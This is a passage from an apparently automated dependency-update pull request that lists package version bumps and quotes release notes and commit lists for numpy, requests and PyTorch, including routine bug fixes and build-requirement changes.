`1.1.6` | `1.2.4` |\n| [haystack-ai](https://github.com/deepset-ai/haystack) | `2.27.0` | `2.30.0` |\n| [litellm](https://github.com/BerriAI/litellm) | `1.86.2` | `1.88.0` |\n| [mkdocs-jupyter](https://github.com/danielfrg/mkdocs-jupyter) | `0.26.2` | `0.26.3` |\n| [opentelemetry-api](https://github.com/open-telemetry/opentelemetry-python) | `1.41.0` | `1.42.1` |\n| [langfuse](https://github.com/langfuse/langfuse) | `4.3.1` | `4.7.1` |\n| [gradio](https://github.com/gradio-app/gradio) | `6.13.0` | `6.16.0` |\n| [pypdf](https://github.com/py-pdf/pypdf) | `6.10.2` | `6.13.0` |\n| [boto3](https://github.com/boto/boto3) | `1.42.90` | `1.43.24` |\n| [notion-client](https://github.com/ramnes/notion-sdk-py) | `3.0.0` | `3.1.0` |\n| [google-api-python-client](https://github.com/googleapis/google-api-python-client) | `2.194.0` | `2.197.0` |\n| [pyjwt](https://github.com/jpadilla/pyjwt) | `2.12.1` | `2.13.0` |\n| [psycopg2-binary](https://github.com/psycopg/psycopg2) | `2.9.11` | `2.9.12` |\n| [google-cloud-aiplatform](https://github.com/googleapis/python-aiplatform) | `1.149.0` | `1.156.0` |\n| [hypothesis](https://github.com/HypothesisWorks/hypothesis) | `6.151.10` | `6.155.2` |\n| [pytest-asyncio](https://github.com/pytest-dev/pytest-asyncio) | `1.3.0` | `1.4.0` |\n| [ruff](https://github.com/astral-sh/ruff) | `0.15.11` | `0.15.16` |\n| [build](https://github.com/pypa/build) | `1.4.3` | `1.5.0` |\n| [aiohappyeyeballs](https://github.com/aio-libs/aiohappyeyeballs) | `2.6.1` | `2.6.2` |\n| [anyio](https://github.com/agronholm/anyio) | `4.12.1` | `4.13.0` |\n| [certifi](https://github.com/certifi/python-certifi) | `2026.2.25` | `2026.5.20` |\n| [huggingface-hub](https://github.com/huggingface/huggingface_hub) | `1.12.0` | `1.18.0` |\n| [idna](https://github.com/kjd/idna) | `3.15` | `3.18` |\n| [propcache](https://github.com/aio-libs/propcache) | `0.4.1` | `0.5.2` |\n| [discord-py](https://github.com/Rapptz/discord.py) | `2.5.2` | `2.7.1` |\n\nUpdates `numpy` from 2.4.4 to 2.4.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/numpy/numpy/releases\"\u003enumpy's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.4.6 (May 18, 2026)\u003c/h2\u003e\n\u003ch1\u003eNumPy 2.4.6 Release Notes\u003c/h1\u003e\n\u003cp\u003eNumPy 2.4.6 is a quick release that fixes a regression discovered in the 2.4.5\nrelease.\u003c/p\u003e\n\u003cp\u003eThis release supports Python versions 3.11-3.14\u003c/p\u003e\n\u003ch2\u003eContributors\u003c/h2\u003e\n\u003cp\u003eA total of 4 people contributed to this release. People with a \u0026quot;+\u0026quot; by their\nnames contributed a patch for the first time.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e!EarlMilktea\u003c/li\u003e\n\u003cli\u003eCharles Harris\u003c/li\u003e\n\u003cli\u003eSebastian Berg\u003c/li\u003e\n\u003cli\u003eWarren Weckesser\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePull requests merged\u003c/h2\u003e\n\u003cp\u003eA total of 4 pull requests were merged for this release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/numpy/numpy/pull/31444\"\u003e#31444\u003c/a\u003e: MAINT: Prepare 2.4.x for further development\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/numpy/numpy/pull/31453\"\u003e#31453\u003c/a\u003e: BUG: Fix regression in \u003ccode\u003earr.conj()\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/numpy/numpy/pull/31459\"\u003e#31459\u003c/a\u003e: BUG: \u003ccode\u003enp.linalg.svd(..., hermitian=True)\u003c/code\u003e returns non-unitary...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/numpy/numpy/pull/31460\"\u003e#31460\u003c/a\u003e: BUG: Don't call INCREF/DECREF on descr in NpyStringAcquireAllocator...\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.4.5 (May 15, 2026)\u003c/h2\u003e\n\u003ch1\u003eNumPy 2.4.5 Release Notes\u003c/h1\u003e\n\u003cp\u003eNumPy 2.4.5 is a patch release that fixes bugs discovered after the 2.4.4\nrelease, has some typing improvements, and maintains infrastructure.\u003c/p\u003e\n\u003cp\u003eThis release supports Python versions 3.11-3.14\u003c/p\u003e\n\u003ch2\u003eContributors\u003c/h2\u003e\n\u003cp\u003eA total of 17 people contributed to this release. People with a \u0026quot;+\u0026quot; by their\nnames contributed a patch for the first time.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAleksei Nikiforov\u003c/li\u003e\n\u003cli\u003eAnarion Zuo +\u003c/li\u003e\n\u003cli\u003eAnkit Ahlawat\u003c/li\u003e\n\u003cli\u003eBreno Favaretto +\u003c/li\u003e\n\u003cli\u003eCharles Harris\u003c/li\u003e\n\u003cli\u003eIgor Krivenko +\u003c/li\u003e\n\u003cli\u003eIjtihed Kilani +\u003c/li\u003e\n\u003cli\u003eJoren Hammudoglu\u003c/li\u003e\n\u003cli\u003eMaarten Baert +\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/b832a09cf2a169c833dd2371e7c07aa00b293242\"\u003e\u003ccode\u003eb832a09\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/numpy/numpy/issues/31462\"\u003e#31462\u003c/a\u003e from charris/prepare-2.4.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/57cc147d2ceacffc6534642bfbdebb3a80428e1e\"\u003e\u003ccode\u003e57cc147\u003c/code\u003e\u003c/a\u003e REL: Prepare for the NumPy 2.4.6 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/0c72b0b53b6b83c004e434b2c7855e73c000d21e\"\u003e\u003ccode\u003e0c72b0b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/numpy/numpy/issues/31459\"\u003e#31459\u003c/a\u003e from charris/backport-31347\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/9778d26e0475d381ccb7817c3b4dd8cacef2b9eb\"\u003e\u003ccode\u003e9778d26\u003c/code\u003e\u003c/a\u003e BUG: core: Don't call INCREF/DECREF on descr in NpyStringAcquireAllocator. (#...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/e0e38767d5d0f848ab44befeedcad71e8ef589c7\"\u003e\u003ccode\u003ee0e3876\u003c/code\u003e\u003c/a\u003e BUG: core: Don't call INCREF/DECREF on descr in NpyStringAcquireAllocator. (#...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/d1bffeb9ec4ec0bf029c94ea35abffa92d5c30f2\"\u003e\u003ccode\u003ed1bffeb\u003c/code\u003e\u003c/a\u003e BUG: \u003ccode\u003enp.linalg.svd(..., hermitian=True)\u003c/code\u003e returns non-unitary \u003ccode\u003evh\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/numpy/numpy/issues/31347\"\u003e#31347\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/8d8d7e5a14a1da0bfb0faf609a7a7610c431e6e9\"\u003e\u003ccode\u003e8d8d7e5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/numpy/numpy/issues/31453\"\u003e#31453\u003c/a\u003e from seberg/issue-31452\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/bddaab7ace45f90148d8f2bb6e67daab2d45ec76\"\u003e\u003ccode\u003ebddaab7\u003c/code\u003e\u003c/a\u003e BUG: Fix regression in \u003ccode\u003earr.conj()\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/37a1ecca8dff09b2c579a991194ac55b9971f3a7\"\u003e\u003ccode\u003e37a1ecc\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/numpy/numpy/issues/31444\"\u003e#31444\u003c/a\u003e from charris/begin-2.4.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/3c0e043217a759a8a948ade158fec14348c3b459\"\u003e\u003ccode\u003e3c0e043\u003c/code\u003e\u003c/a\u003e MAINT: Prepare 2.4.x for further development\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/numpy/numpy/compare/v2.4.4...v2.4.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `requests` from 2.33.1 to 2.34.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.34.2\u003c/h2\u003e\n\u003ch2\u003e2.34.2 (2026-05-14)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMoved \u003ccode\u003eheaders\u003c/code\u003e input type back to \u003ccode\u003eMapping\u003c/code\u003e to avoid invariance issues with \u003ccode\u003eMutableMapping\u003c/code\u003e and inferred dict types. Users calling \u003ccode\u003eRequest.headers.update()\u003c/code\u003e may need to narrow typing in their code. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7441\"\u003e#7441\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md#2342-2026-05-14\"\u003ehttps://github.com/psf/requests/blob/main/HISTORY.md#2342-2026-05-14\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.34.1\u003c/h2\u003e\n\u003ch2\u003e2.34.1 (2026-05-13)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eWidened \u003ccode\u003ejson\u003c/code\u003e input type from \u003ccode\u003edict\u003c/code\u003e and \u003ccode\u003elist\u003c/code\u003e to \u003ccode\u003eMapping\u003c/code\u003e\nand \u003ccode\u003eSequence\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7436\"\u003e#7436\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eChanged \u003ccode\u003eheaders\u003c/code\u003e input type to MutableMapping and removed \u003ccode\u003eNone\u003c/code\u003e from\n\u003ccode\u003eRequest.headers\u003c/code\u003e typing to improve handling for users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7431\"\u003e#7431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eResponse.reason\u003c/code\u003e moved from \u003ccode\u003estr | None\u003c/code\u003e to \u003ccode\u003estr\u003c/code\u003e to improve handling\nfor users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7437\"\u003e#7437\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed a bug where some bodies with custom \u003ccode\u003e__getattr__\u003c/code\u003e implementations\nweren't being properly detected as Iterables. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7433\"\u003e#7433\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/k223kim\"\u003e\u003ccode\u003e@​k223kim\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/psf/requests/pull/7433\"\u003epsf/requests#7433\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md#2341-2026-05-13\"\u003ehttps://github.com/psf/requests/blob/main/HISTORY.md#2341-2026-05-13\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.34.0\u003c/h2\u003e\n\u003ch2\u003e2.34.0 (2026-05-11)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eAnnouncements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eRequests 2.34.0 introduces inline types, replacing those provided by\ntypeshed. Public API types should be fully compatible with mypy, pyright,\nand ty. \u003cstrong\u003eWe believe types are comprehensive but if you find issues, please\nreport them to the \u003ca href=\"https://redirect.github.com/psf/requests/issues/7271\"\u003epinned tracking issue\u003c/a\u003e.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eSpecial thanks to \u003ca href=\"https://github.com/bastimeyer\"\u003e\u003ccode\u003e@​bastimeyer\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/cthoyt\"\u003e\u003ccode\u003e@​cthoyt\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/edgarrmondragon\"\u003e\u003ccode\u003e@​edgarrmondragon\u003c/code\u003e\u003c/a\u003e, and \u003ca href=\"https://github.com/srittau\"\u003e\u003ccode\u003e@​srittau\u003c/code\u003e\u003c/a\u003e for\nhelping review and test the types ahead of the release. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7272\"\u003e#7272\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDigest Auth hashing algorithms have added \u003ccode\u003eusedforsecurity=False\u003c/code\u003e to clarify\nsecurity considerations. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7310\"\u003e#7310\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests added support for Python 3.15 based on beta1. Downstream projects\nshould be able to start testing prior to its release in October. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7422\"\u003e#7422\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests added support for Python 3.14t. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7419\"\u003e#7419\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eResponse.history\u003c/code\u003e no longer contains a reference to itself, preventing\naccidental looping when traversing the history list. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7328\"\u003e#7328\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests no longer performs greedy matching on no_proxy domains. The\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.34.2 (2026-05-14)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMoved \u003ccode\u003eheaders\u003c/code\u003e input type back to \u003ccode\u003eMapping\u003c/code\u003e to avoid invariance issues\nwith \u003ccode\u003eMutableMapping\u003c/code\u003e and inferred dict types. Users calling\n\u003ccode\u003eRequest.headers.update()\u003c/code\u003e may need to narrow typing in their code. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7441\"\u003e#7441\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.34.1 (2026-05-13)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eWidened \u003ccode\u003ejson\u003c/code\u003e input type from \u003ccode\u003edict\u003c/code\u003e and \u003ccode\u003elist\u003c/code\u003e to \u003ccode\u003eMapping\u003c/code\u003e\nand \u003ccode\u003eSequence\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7436\"\u003e#7436\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eChanged \u003ccode\u003eheaders\u003c/code\u003e input type to MutableMapping and removed \u003ccode\u003eNone\u003c/code\u003e from\n\u003ccode\u003eRequest.headers\u003c/code\u003e typing to improve handling for users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7431\"\u003e#7431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eResponse.reason\u003c/code\u003e moved from \u003ccode\u003estr | None\u003c/code\u003e to \u003ccode\u003estr\u003c/code\u003e to improve handling\nfor users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7437\"\u003e#7437\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed a bug where some bodies with custom \u003ccode\u003e__getattr__\u003c/code\u003e implementations\nweren't being properly detected as Iterables. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7433\"\u003e#7433\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.34.0 (2026-05-11)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eAnnouncements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eRequests 2.34.0 introduces inline types, replacing those provided by\ntypeshed. Public API types should be fully compatible with mypy, pyright,\nand ty. We believe types are comprehensive but if you find issues, please\nreport them to the pinned tracking issue.\u003c/p\u003e\n\u003cp\u003eSpecial thanks to \u003ca href=\"https://github.com/bastimeyer\"\u003e\u003ccode\u003e@​bastimeyer\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/cthoyt\"\u003e\u003ccode\u003e@​cthoyt\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/edgarrmondragon\"\u003e\u003ccode\u003e@​edgarrmondragon\u003c/code\u003e\u003c/a\u003e, and \u003ca href=\"https://github.com/srittau\"\u003e\u003ccode\u003e@​srittau\u003c/code\u003e\u003c/a\u003e for\nhelping review and test the types ahead of the release. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7272\"\u003e#7272\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDigest Auth hashing algorithms have added \u003ccode\u003eusedforsecurity=False\u003c/code\u003e to clarify\nsecurity considerations. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7310\"\u003e#7310\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests added support for Python 3.15 based on beta1. Downstream projects\nshould be able to start testing prior to its release in October. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7422\"\u003e#7422\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests added support for Python 3.14t. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7419\"\u003e#7419\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eResponse.history\u003c/code\u003e no longer contains a reference to itself, preventing\naccidental looping when traversing the history list. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7328\"\u003e#7328\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests no longer performs greedy matching on no_proxy domains. The\nproxy_bypass implementation has been updated with CPython's fix from\nbpo-39057. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7427\"\u003e#7427\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests no longer incorrectly strips duplicate leading slashes in\nURI paths. This should address user issues with specific presigned\nURLs. Note the full fix requires urllib3 2.7.0+. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7315\"\u003e#7315\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6e83187b8feb273ed4c6cdab5efd8d54901dfab3\"\u003e\u003ccode\u003e6e83187\u003c/code\u003e\u003c/a\u003e v2.34.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/84d10f0be83e8f6aeca8a05230c52216431c4d0b\"\u003e\u003ccode\u003e84d10f0\u003c/code\u003e\u003c/a\u003e Move Request.headers back to Mapping (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7441\"\u003e#7441\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/b7b549b54571d03950b16afd2d01bc6ff0348224\"\u003e\u003ccode\u003eb7b549b\u003c/code\u003e\u003c/a\u003e v2.34.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/e511bc72777a94c45d004e010c597925092e1efe\"\u003e\u003ccode\u003ee511bc7\u003c/code\u003e\u003c/a\u003e Fix mutability issues with headers input types (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7431\"\u003e#7431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/5691f596134c2feb121e595c77a0178921fcce61\"\u003e\u003ccode\u003e5691f59\u003c/code\u003e\u003c/a\u003e Update JsonType containers to read-based collections (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7436\"\u003e#7436\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/2144213c307691710c9d665700860fc4993c3035\"\u003e\u003ccode\u003e2144213\u003c/code\u003e\u003c/a\u003e Constrain Response.reason to str (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7437\"\u003e#7437\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6404f345e562d962abe6700a1c357ec1e7e18232\"\u003e\u003ccode\u003e6404f34\u003c/code\u003e\u003c/a\u003e Fix \u003ccode\u003eprepare_body\u003c/code\u003e stream detection for \u003ccode\u003e__getattr__\u003c/code\u003e-based file wrappers (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7\"\u003e#7\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/0b401c76b6e80a4eecf3c690085b2553f6e261ca\"\u003e\u003ccode\u003e0b401c7\u003c/code\u003e\u003c/a\u003e v2.34.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/86b378d3f60f828daa13ca50aa82e287ff7b66b4\"\u003e\u003ccode\u003e86b378d\u003c/code\u003e\u003c/a\u003e Align Session.get parameters with requests.get (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7429\"\u003e#7429\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/a4f9a5999bdb9bf2d6e7c8aa973b28cacb17134f\"\u003e\u003ccode\u003ea4f9a59\u003c/code\u003e\u003c/a\u003e Port bpo-39057 to Requests (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7427\"\u003e#7427\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/psf/requests/compare/v2.33.1...v2.34.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `torch` from 2.11.0 to 2.12.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytorch/pytorch/releases\"\u003etorch's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003ePyTorch 2.12.0 Release Notes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#highlights\"\u003eHighlights\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#backwards-incompatible-changes\"\u003eBackwards Incompatible Changes\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#deprecations\"\u003eDeprecations\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#new-features\"\u003eNew Features\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#improvements\"\u003eImprovements\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#bug-fixes\"\u003eBug fixes\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#performance\"\u003ePerformance\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#documentation\"\u003eDocumentation\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#developers\"\u003eDevelopers\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#security\"\u003eSecurity\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eHighlights\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cp\u003eFor more details about these highlighted features, you can look at the release blogpost. Below are the full release notes for this release.\u003c/p\u003e\n\u003ch1\u003eBackwards Incompatible Changes\u003c/h1\u003e\n\u003ch2\u003eBuild Frontend\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eStrengthened SVE compile checks in \u003ccode\u003eFindARM.cmake\u003c/code\u003e, which may reject previously accepted but incorrect SVE configurations (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/pull/176646\"\u003e#176646\u003c/a\u003e)\u003c/p\u003e\n\u003cp\u003eSource builds that enable SVE now validate the compiler configuration more strictly. If a build previously passed with an incomplete or mismatched SVE setup, it may now fail during CMake configuration instead of later in compilation. Update the compiler/toolchain flags so they accurately describe the target SVE support, or disable SVE for that build.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdated the minimum CUDA version required to build PyTorch from source to CUDA 12.6 (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/pull/178925\"\u003e#178925\u003c/a\u003e)\u003c/p\u003e\n\u003cp\u003eBuilding PyTorch from source with CUDA versions older than 12.6 is no longer supported. Users building custom binaries should install CUDA 12.6 or newer and make sure \u003ccode\u003eCUDA_HOME\u003c/code\u003e points to that installation.\u003c/p\u003e\n\u003cp\u003eVersion 2.11:\u003c/p\u003e\n\u003cpre lang=\"bash\"\u003e\u003ccode\u003eCUDA_HOME=/usr/local/cuda-12.4 python setup.py develop\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eVersion 2.12:\u003c/p\u003e\n\u003cpre lang=\"bash\"\u003e\u003ccode\u003eCUDA_HOME=/usr/local/cuda-12.6 python setup.py develop\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eEnforced a C++20 minimum in CMake build files (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/pull/178662\"\u003e#178662\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/0d62256a2b23365f8e1604297eb23a6545102aa8\"\u003e\u003ccode\u003e0d62256\u003c/code\u003e\u003c/a\u003e [release] Dockerfile: skip torchaudio install when CUDA_PATH=cu132 (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/183346\"\u003e#183346\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/7661cd9c6b841b62b7f411aa52ec51f05457263b\"\u003e\u003ccode\u003e7661cd9\u003c/code\u003e\u003c/a\u003e [MPS] Fix SDPA wrong output for permuted q/k/v with B \u0026gt; 1 (\u003ca 